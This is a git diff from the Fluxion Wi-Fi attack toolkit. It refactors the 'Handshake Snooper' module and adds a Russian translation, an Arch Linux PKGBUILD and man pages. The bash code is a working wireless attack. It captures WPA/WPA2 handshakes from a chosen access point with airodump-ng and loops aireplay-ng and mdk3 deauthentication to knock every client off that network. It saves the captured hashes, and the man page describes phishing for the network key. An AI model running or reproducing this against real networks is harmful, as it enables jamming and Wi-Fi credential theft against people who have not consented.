+handshake_snooper_arbiter_daemon() { + if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then + return 1; + fi # Start daemon in the running state to continue execution until aborted, # or until a hash has been verified to exist in the capture file. @@ -15,13 +30,16 @@ function handshake_snooper_arbiter_daemon() { function handshake_snooper_arbiter_daemon_abort() { handshake_snooper_arbiter_daemon_state="aborted" - if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then kill $handshake_snooper_arbiter_daemon_viewerPID + if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then + kill $handshake_snooper_arbiter_daemon_viewerPID fi handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterAbortedWarning" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + local -r now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperArbiterAbortedWarning" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" exit 2 } @@ -34,10 +52,14 @@ function handshake_snooper_arbiter_daemon() { sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*" # Display some feedback to the user to assure verifier is working. - xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Arbiter Log" -e "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" & + xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" \ + -title "Handshake Snooper Arbiter Log" -e \ + "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" & local handshake_snooper_arbiter_daemon_viewerPID=$! - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStartingArbiterNotice" >"$FLUXIONWorkspacePath/handshake_snooper.log" + local now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperStartingArbiterNotice" > \ + "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_start_captor handshake_snooper_start_deauthenticator @@ -46,26 +68,38 @@ function handshake_snooper_arbiter_daemon() { # Keep snooping and verifying until we've got a valid hash from the capture file. while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do - echo -e "[$(env -i date '+%H:%M:%S')] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" sleep $HANDSHAKEVerifierInterval & wait $! # Using wait to asynchronously catch flags while waiting. # If synchronously searching, stop the captor and deauthenticator before checking. if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ]; then - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStoppingForVerifierNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperStoppingForVerifierNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor - mv "$FLUXIONWorkspacePath/capture/dump-01.cap" "$FLUXIONWorkspacePath/capture/recent.cap" + mv "$FLUXIONWorkspacePath/capture/dump-01.cap" \ + "$FLUXIONWorkspacePath/capture/recent.cap" else - pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &>$FLUXIONOutputDevice + pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" \ + -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> \ + $FLUXIONOutputDevice fi - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperSearchingForHashesNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" - hash_check_handshake "$HANDSHAKEVerifierIdentifier" "$FLUXIONWorkspacePath/capture/recent.cap" "$APTargetSSID" "$APTargetMAC" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperSearchingForHashesNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" + hash_check_handshake "$HANDSHAKEVerifierIdentifier" \ + "$FLUXIONWorkspacePath/capture/recent.cap" \ + "$FluxionTargetSSID" "$FluxionTargetMAC" handshake_snooper_arbiter_daemon_verified=$? # If synchronously searching, restart the captor and deauthenticator after checking. - if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then + if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a \ + $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*" handshake_snooper_start_captor @@ -78,34 +112,39 @@ function handshake_snooper_arbiter_daemon() { handshake_snooper_stop_captor local completionTime=$(env -i date '+%H:%M:%S') - echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" - echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" + echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" # Assure we've got a directory to store hashes into. mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/" # Move handshake to storage if one was acquired. - mv "$FLUXIONWorkspacePath/capture/recent.cap" "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" + mv "$FLUXIONWorkspacePath/capture/recent.cap" \ + "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" # Signal parent process the verification terminated. kill -s SIGABRT $1 } -function handshake_snooper_stop_captor() { - if [ "$HANDSHAKECaptorPID" ]; then kill -s SIGINT $HANDSHAKECaptorPID &>$FLUXIONOutputDevice +handshake_snooper_stop_captor() { + if [ "$HANDSHAKECaptorPID" ]; then + kill -s SIGINT $HANDSHAKECaptorPID &> $FLUXIONOutputDevice fi HANDSHAKECaptorPID="" } -function handshake_snooper_start_captor() { +handshake_snooper_start_captor() { if [ "$HANDSHAKECaptorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi handshake_snooper_stop_captor - xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ - airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor & + xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $FluxionTargetChannel)" \ + $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ + airodump-ng --ignore-negative-one -d $FluxionTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $FluxionTargetChannel -a $HandshakeSnooperJammerInterface & local parentPID=$! while [ ! "$HANDSHAKECaptorPID" ]; do @@ -115,14 +154,14 @@ function handshake_snooper_start_captor() { done } -function handshake_snooper_stop_deauthenticator() { +handshake_snooper_stop_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ]; then kill $HANDSHAKEDeauthenticatorPID &>$FLUXIONOutputDevice fi HANDSHAKEDeauthenticatorPID="" } -function handshake_snooper_start_deauthenticator() { +handshake_snooper_start_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi @@ -130,75 +169,133 @@ function handshake_snooper_start_deauthenticator() { # Prepare deauthenticators case "$HANDSHAKEDeauthenticatorIdentifier" in - "$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" >$FLUXIONWorkspacePath/mdk3_blacklist.lst ;; + "$HandshakeSnooperMdk3MethodOption") + echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;; esac # Start deauthenticators. case "$HANDSHAKEDeauthenticatorIdentifier" in - "$HandshakeSnooperAireplayMethodOption") - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" & - HANDSHAKEDeauthenticatorPID=$! + "$HandshakeSnooperAireplayMethodOption") + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ + -title "Deauthenticating all clients on $FluxionTargetSSID" -e \ + "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" & + HANDSHAKEDeauthenticatorPID=$! ;; - "$HandshakeSnooperMdk3MethodOption") - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" & - HANDSHAKEDeauthenticatorPID=$! + "$HandshakeSnooperMdk3MethodOption") + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ + -title "Deauthenticating all clients on $FluxionTargetSSID" -e \ + "while true; do sleep 7; timeout 3 mdk3 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" & + HANDSHAKEDeauthenticatorPID=$! ;; esac } -function handshake_snooper_unset_deauthenticator_identifier() { + +handshake_snooper_unset_deauthenticator_identifier() { + if [ ! "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 1; fi HANDSHAKEDeauthenticatorIdentifier="" } -function handshake_snooper_set_deauthenticator_identifier() { +handshake_snooper_set_deauthenticator_identifier() { if [ "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 0; fi handshake_snooper_unset_deauthenticator_identifier - local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption") + local methods=( + "$HandshakeSnooperMonitorMethodOption" + "$HandshakeSnooperAireplayMethodOption" + "$HandshakeSnooperMdk3MethodOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$HandshakeSnooperMethodQuery" methods[@] HANDSHAKEDeauthenticatorIdentifier=$IOQueryChoice echo - if [ "$HANDSHAKEDeauthenticatorIdentifier" = "$FLUXIONGeneralBackOption" ]; then + if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ + "$FLUXIONGeneralBackOption" ]; then handshake_snooper_unset_deauthenticator_identifier return 1 fi } -function handshake_snooper_unset_verifier_identifier() { +handshake_snooper_unset_jammer_interface() { + if [ ! "$HandshakeSnooperJammerInterface" ]; then return 1; fi + HandshakeSnooperJammerInterface="" + + # Check if we're automatically selecting the interface & skip + # this one if so to take the user back properly. + local interfacesAvailable + readarray -t interfacesAvailable < <(attack_targetting_interfaces) + + if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi +} + +handshake_snooper_set_jammer_interface() { + if [ "$HandshakeSnooperJammerInterface" ]; then return 0; fi + if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ + "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi + + if [ ! "$HandshakeSnooperUninitializedJammerInterface" ]; then + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$HandshakeSnooperJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$HandshakeSnooperUninitializedJammerInterface + unset HandshakeSnooperUninitializedJammerInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice + return 2 + fi + + echo "Succeeded get jammer interface." > $FLUXIONOutputDevice + HandshakeSnooperJammerInterface=${FluxionInterfaces[$selectedInterface]} +} + +handshake_snooper_unset_verifier_identifier() { + if [ ! "$HANDSHAKEVerifierIdentifier" ]; then return 1; fi HANDSHAKEVerifierIdentifier="" } -function handshake_snooper_set_verifier_identifier() { +handshake_snooper_set_verifier_identifier() { if [ "$HANDSHAKEVerifierIdentifier" ]; then return 0; fi handshake_snooper_unset_verifier_identifier - local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") + local choices=( + "$FLUXIONHashVerificationMethodPyritOption" + "$FLUXIONHashVerificationMethodAircrackOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@] echo case "$IOQueryChoice" in - "$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifierIdentifier="pyrit" ;; - "$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifierIdentifier="aircrack-ng" ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_identifier - return 1 - ;; + "$FLUXIONHashVerificationMethodPyritOption") + HANDSHAKEVerifierIdentifier="pyrit" ;; + "$FLUXIONHashVerificationMethodAircrackOption") + HANDSHAKEVerifierIdentifier="aircrack-ng" ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_identifier + return 1 + ;; esac } -function handshake_snooper_unset_verifier_interval() { +handshake_snooper_unset_verifier_interval() { + if [ ! "$HANDSHAKEVerifierInterval" ]; then return 1; fi HANDSHAKEVerifierInterval="" } -function handshake_snooper_set_verifier_interval() { +handshake_snooper_set_verifier_interval() { if [ "$HANDSHAKEVerifierInterval" ]; then return 0; fi handshake_snooper_unset_verifier_interval @@ -207,84 +304,136 @@ function handshake_snooper_set_verifier_interval() { io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@] case "$IOQueryChoice" in - "$HandshakeSnooperVerifierInterval30SOption") HANDSHAKEVerifierInterval=30 ;; - "$HandshakeSnooperVerifierInterval60SOption") HANDSHAKEVerifierInterval=60 ;; - "$HandshakeSnooperVerifierInterval90SOption") HANDSHAKEVerifierInterval=90 ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_interval - return 1 - ;; + "$HandshakeSnooperVerifierInterval30SOption") + HANDSHAKEVerifierInterval=30 ;; + "$HandshakeSnooperVerifierInterval60SOption") + HANDSHAKEVerifierInterval=60 ;; + "$HandshakeSnooperVerifierInterval90SOption") + HANDSHAKEVerifierInterval=90 ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_interval + return 1 + ;; esac } -function handshake_snooper_unset_verifier_synchronicity() { +handshake_snooper_unset_verifier_synchronicity() { + if [ ! "$HANDSHAKEVerifierSynchronicity" ]; then return 1; fi HANDSHAKEVerifierSynchronicity="" } -function handshake_snooper_set_verifier_synchronicity() { +handshake_snooper_set_verifier_synchronicity() { if [ "$HANDSHAKEVerifierSynchronicity" ]; then return 0; fi handshake_snooper_unset_verifier_synchronicity - local choices=("$HandshakeSnooperVerifierSynchronicityAsynchronousOption" "$HandshakeSnooperVerifierSynchronicitySynchronousOption" "$FLUXIONGeneralBackOption") + local choices=( + "$HandshakeSnooperVerifierSynchronicityAsynchronousOption" + "$HandshakeSnooperVerifierSynchronicitySynchronousOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@] case "$IOQueryChoice" in - "$HandshakeSnooperVerifierSynchronicityAsynchronousOption") HANDSHAKEVerifierSynchronicity="non-blocking" ;; - "$HandshakeSnooperVerifierSynchronicitySynchronousOption") HANDSHAKEVerifierSynchronicity="blocking" ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_synchronicity - return 1 - ;; + "$HandshakeSnooperVerifierSynchronicityAsynchronousOption") + HANDSHAKEVerifierSynchronicity="non-blocking" ;; + "$HandshakeSnooperVerifierSynchronicitySynchronousOption") + HANDSHAKEVerifierSynchronicity="blocking" ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_synchronicity + return 1 + ;; esac } -function unprep_attack() { + +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if [ ! "$HandshakeSnooperCLIArguments" ]; then + if ! HandshakeSnooperCLIArguments=$( + getopt --options="v:i:j:a" \ + --longoptions="verifier:,interval:,jammer:,asynchronous" \ + --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..." + sleep 5 + fluxion_handle_exit + fi + + declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments + + eval set -- "$HandshakeSnooperCLIArguments" # Set environment parameters. +fi + + +# ============================================================ # +# ============= < Argument Loaded Configurables > ============ # +# ============================================================ # +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -v|--verifier) + HandshakeSnooperVerifierIdentifier=$2; shift;; + -i|--interval) + HandshakeSnooperVerifierInterval=$2; shift;; + -j|--jammer) + HandshakeSnooperUninitializedJammerInterface=$2; shift;; + -a|--asynchronous) + HandshakeSnooperVerifierSynchronicity="non-blocking";; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < Fluxion Hooks > ==================== # +# ============================================================ # +attack_targetting_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" + done +} + +unprep_attack() { HandshakeSnooperState="Not Ready" handshake_snooper_unset_verifier_synchronicity handshake_snooper_unset_verifier_interval handshake_snooper_unset_verifier_identifier + handshake_snooper_unset_jammer_interface handshake_snooper_unset_deauthenticator_identifier sandbox_remove_workfile "$FLUXIONWorkspacePath/capture" } -function prep_attack() { +prep_attack() { mkdir -p "$FLUXIONWorkspacePath/capture" - while true; do - handshake_snooper_set_deauthenticator_identifier - if [ $? -ne 0 ]; then break; fi - handshake_snooper_set_verifier_identifier - if [ $? -ne 0 ]; then - handshake_snooper_unset_deauthenticator_identifier - continue - fi - handshake_snooper_set_verifier_interval - if [ $? -ne 0 ]; then - handshake_snooper_unset_verifier_identifier - continue - fi - handshake_snooper_set_verifier_synchronicity - if [ $? -ne 0 ]; then - handshake_snooper_unset_verifier_interval - continue - fi - HandshakeSnooperState="Ready" - break - done + IOUtilsHeader="handshake_snooper_header" - # Check for handshake abortion. - if [ "$HandshakeSnooperState" != "Ready" ]; then - unprep_attack + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local sequence=( + "set_deauthenticator_identifier" + "set_jammer_interface" + "set_verifier_identifier" + "set_verifier_interval" + "set_verifier_synchronicity" + ) + + if ! fluxion_do_sequence handshake_snooper sequence[@]; then return 1 fi + + HandshakeSnooperState="Ready" } -function stop_attack() { +stop_attack() { if [ "$HANDSHAKEArbiterPID" ]; then - kill -s SIGABRT $HANDSHAKEArbiterPID &>$FLUXIONOutputDevice + kill -s SIGABRT $HANDSHAKEArbiterPID &> $FLUXIONOutputDevice fi HANDSHAKEArbiterPID="" @@ -292,12 +441,12 @@ function stop_attack() { HandshakeSnooperState="Stopped" } -function start_attack() { +start_attack() { if [ "$HandshakeSnooperState" = "Running" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Ready" ]; then return 1; fi HandshakeSnooperState="Running" - handshake_snooper_arbiter_daemon $$ &>$FLUXIONOutputDevice & + handshake_snooper_arbiter_daemon $$ &> $FLUXIONOutputDevice & HANDSHAKEArbiterPID=$! } diff --git a/attacks/Handshake Snooper/language/en.sh b/attacks/Handshake Snooper/language/en.sh index abf241a..23823e5 100755 --- a/attacks/Handshake Snooper/language/en.sh +++ b/attacks/Handshake Snooper/language/en.sh @@ -2,6 +2,8 @@ # identifier: Handshake Snopper # description: Acquires WPA/WPA2 encryption hashes. + +HandshakeSnooperJammerInterfaceQuery="Select an interface for jamming." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HandshakeSnooperMethodQuery="Select a method of handshake retrieval" HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passive$CClr)" diff --git a/attacks/Handshake Snooper/language/ru.sh b/attacks/Handshake Snooper/language/ru.sh new file mode 100755 index 0000000..9cb698a --- /dev/null +++ b/attacks/Handshake Snooper/language/ru.sh @@ -0,0 +1,31 @@ +#!/bin/bash +# identifier: Handshake Snopper +# description: Получает зашифрованные WPA/WPA2 хэши (рукопожатия). + + +HandshakeSnooperJammerInterfaceQuery="Выберите интерфейс для глушения." +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +HandshakeSnooperMethodQuery="Выберите метод получения рукопожатия" +HandshakeSnooperMonitorMethodOption="Наблюдение (${CYel}пассивный$CClr)" +HandshakeSnooperAireplayMethodOption="Деаутентификация с aireplay-ng (${CRed}агрессивный$CClr)" +HandshakeSnooperMdk3MethodOption="Деаутентификация с mdk3 (${CRed} агрессивный $CClr)" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +HandshakeSnooperVerifierIntervalQuery="Как часто проверять наличие рукопожатия?" +HandshakeSnooperVerifierInterval30SOption="Каждые 30 секунд (${CGrn}рекомендуется${CClr})." +HandshakeSnooperVerifierInterval60SOption="Каждые 60 секунд." +HandshakeSnooperVerifierInterval90SOption="Каждые 90 секунд." +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +HandshakeSnooperVerifierSynchronicityQuery="Как должна происходить верификация?" +HandshakeSnooperVerifierSynchronicityAsynchronousOption="Асинхронно (${CYel}только на быстрых системах${CClr})." +HandshakeSnooperVerifierSynchronicitySynchronousOption="Синхронно (${CGrn}рекомендуется${CClr})." +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +HandshakeSnooperStartingArbiterNotice="Запуск демона ${CCyn}Handshake Snooper$CClr." +HandshakeSnooperSnoopingForNSecondsNotice="Проверка каждые \$HANDSHAKEVerifierInterval секунд." +HandshakeSnooperStoppingForVerifierNotice="Остановка атаки и проверка хэшей." +HandshakeSnooperSearchingForHashesNotice="Поиск хэшей в файле захвата." +HandshakeSnooperArbiterAbortedWarning="${CYel}Прервано${CClr}: Операция была прервана, не найдено валидного хэша." +HandshakeSnooperArbiterSuccededNotice="${CGrn}Успех${CClr}: Валидный хэш был найден и сохранён в базе данных fluxion." +HandshakeSnooperArbiterCompletedTip="Атака ${CBCyn}Handshake Snooper$CBYel завершена, закройте это окно и начните другую атаку.$CClr" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> + +# FLUXSCRIPT END diff --git a/bin/arch/PKGBUILD b/bin/arch/PKGBUILD new file mode 100644 index 0000000..3640785 --- /dev/null +++ b/bin/arch/PKGBUILD @@ -0,0 +1,66 @@ +# Maintainer: Cyberfee + +_pkgname=fluxion +pkgname=$_pkgname-git +pkgver=r1183.63b821f +pkgrel=1 +pkgdesc='Fluxion is a security auditing and social-engineering research tool' +url='https://github.com/FluxionNetwork/fluxion' +license=('GPL3') +source=('git://github.com/FluxionNetwork/fluxion.git#branch=master') + +depends=( + 'aircrack-ng' 'bash>=4.2' 'coreutils' + 'awk' 'iw' 'unzip' + 'curl' 'bc' 'xterm' +) + +makedepends=('binutils' 'coreutils' 'git') +conflicts=('fluxion-git') +provides=('fluxion-git') +sha256sums=('SKIP') +arch=('any') + +prepare() { + if [ -d "$srcdir/$pkgname" ]; then + rm -rf "$srcdir/$pkgname" + fi + + mkdir -p "$srcdir/$pkgname" + cd "$srcdir/$pkgname" +} + +pkgver() { + cd "$srcdir/$_pkgname" + + ( set -o pipefail + git describe --long 2>/dev/null | sed 's/\([^-]*-g\)/r\1/;s/-/./g' || + printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)" + ) +} + +prepare() { + cd "$srcdir/$_pkgname" +} + +package() { + cd "$srcdir/$_pkgname" + + mkdir -p "$pkgdir/usr/bin" + mkdir -p "$pkgdir/usr/share/fluxion" + + install -Dm644 -t "$pkgdir/usr/share/doc/fluxion/" README.md + install -Dm644 LICENSE "$pkgdir/usr/share/licenses/airgeddon/LICENSE" + + rm -rf *.md .git* *.yml .project .editorconfig + + cp -a --no-preserve=ownership * "$pkgdir/usr/share/fluxion" + + cat > "$pkgdir/usr/bin/fluxion" << EOF +#!/bin/sh +cd /usr/share/fluxion +exec bash fluxion.sh "\${@}" +EOF + + chmod a+x "$pkgdir/usr/bin/fluxion" +} \ No newline at end of file diff --git a/docs/man/fluxion.1 b/docs/man/fluxion.1 new file mode 100644 index 0000000..bdd5454 --- /dev/null +++ b/docs/man/fluxion.1 @@ -0,0 +1,76 @@ +.TH FLUXION 1 "MARCH 2018" Linux "User Manuals" +.SH NAME +fluxion \- Fluxion is a security auditing and social-engineering research tool +.SH SYNOPSIS +.B fluxion [-debug] [-l +.I language +.B ] +.I attack +.B ... +.SH DESCRIPTION +.B fluxion is a security auditing and social-engineering research tool. +It is a remake of linset by vk496 with (hopefully) less bugs +and more functionality. The script attempts to retrieve the WPA/WPA2 +key from a target access point by means of a social engineering +(phising) attack. It's compatible with the latest release of Kali +(rolling). Fluxion's attacks' setup is mostly manual, +but experimental auto-mode handles some of the attacks' +setup parameters. +.SH OPTIONS +.IP "-v " +Print version number. +.IP "--help " +Print help page and exit with 0. +.IP "-m " +Run fluxion in manual mode instead of auto mode. +.IP "-k " +Kill wireless connection if it is connected. +.IP "-d " +Run fluxion in debug mode. +.IP "-x " +Try to run fluxion with xterm terminals instead of tmux. +.IP "-r " +Reload driver. +.IP "-l " +Define a certain language. +.IP "-e " +Select the target network based on the ESSID. +.IP "-c " +Indicate the channel(s) to listen to. +.IP "-a " +Define a certain attack. +.IP "--ratio " +Define the windows size. Bigger ratio -> smaller window size. +Default is 4. +.IP "-b " +Select the target network based on the access point MAC address. +.IP "-j " +Define a certain jamming interface. +.IP "-a " +Define a certain access point interface. +.SH FILES +.I /tmp/fluxspace/ +.RS +The system wide tmp directory. +.RE +.I $FLUXION/attacks/ +.RS +Folder where handshakes and passwords +are stored in. +.SH ENVIRONMENT +.IP FLUXIONAuto +Automatically run fluxion in auto mode if exported. +.IP FLUXIONDebug +Automatically run fluxion in debug mode if exported. +.IP FLUXIONWIKillProcesses +Automatically kill any interfering process(es). +.SH DIAGNOSTICS +Please checkout the other log files or use +the debug mode. +.SH BUGS +Please report any bugs at: +https://github.com/FluxionNetwork/fluxion/issues +.SH AUTHOR +Cyberfee, l3op, dlinkproto, vk496, MPX4132 +.SH "SEE ALSO" +.BR aircrack-ng (8), diff --git a/docs/man/fluxion.man b/docs/man/fluxion.man new file mode 100644 index 0000000..65fe62e --- /dev/null +++ b/docs/man/fluxion.man @@ -0,0 +1,92 @@ +FLUXION(1) User Manuals FLUXION(1) + + + +NAME + fluxion - Fluxion is a security auditing and social-engineering + research tool + +SYNOPSIS + fluxion [-debug] [-l language ] attack ... + +DESCRIPTION + fluxion is a security auditing and social-engineering research tool. + It is a remake of linset by vk496 with (hopefully) less bugs and more + functionality. The script attempts to retrieve the WPA/WPA2 key from a + target access point by means of a social engineering (phising) attack. + It's compatible with the latest release of Kali (rolling). Fluxion's + attacks' setup is mostly manual, but experimental auto-mode handles + some of the attacks' setup parameters. + +OPTIONS + -v Print version number. + + --help Print help page and exit with 0. + + -m Run fluxion in manual mode instead of auto mode. + + -k Kill wireless connection if it is connected. + + -d Run fluxion in debug mode. + + -x Try to run fluxion with xterm terminals instead of tmux. + + -r Reload driver. + + -l + Define a certain language. + + -e + Select the target network based on the ESSID. + + -c + Indicate the channel(s) to listen to. + + -a + Define a certain attack. + + --ratio + Define the windows size. Bigger ratio -> smaller window size. + Default is 4. + + -b + Select the target network based on the access point MAC address. + + -j + Define a certain jamming interface. + + -a + Define a certain access point interface. + +FILES + /tmp/fluxspace/ + The system wide tmp directory. + $FLUXION/attacks/ + Folder where handshakes and passwords are stored in. + +ENVIRONMENT + FLUXIONAuto + Automatically run fluxion in auto mode if exported. + + FLUXIONDebug + Automatically run fluxion in debug mode if exported. + + FLUXIONWIKillProcesses + Automatically kill any interfering process(es). + +DIAGNOSTICS + Please checkout the other log files or use the debug mode. + +BUGS + Please report any bugs at: https://github.com/FluxionNetwork/flux- + ion/issues + +AUTHOR + Cyberfee, l3op, dlinkproto, vk496, MPX4132 + +SEE ALSO + aircrack-ng(8), + + + +Linux MARCH 2018 FLUXION(1) \ No newline at end of file diff --git a/fluxion b/fluxion new file mode 100755 index 0000000..7477daa --- /dev/null +++ b/fluxion @@ -0,0 +1,1702 @@ +#!/bin/bash + +# ============================================================ # +# ================== < FLUXION Parameters > ================== # +# ============================================================ # +# Warning: The FLUXIONPath constant will be incorrectly set when +# called directly via a system link. System links in the path to +# the script, however, will be loaded correctly. + +# Path to directory containing the FLUXION executable script. +readonly FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) + +# Path to the temp. directory available to FLUXION & subscripts. +readonly FLUXIONWorkspacePath="/tmp/fluxspace" +readonly FLUXIONIPTablesBackup="$FLUXIONPath/iptables-rules" + +# Path to FLUXION's preferences file, to be 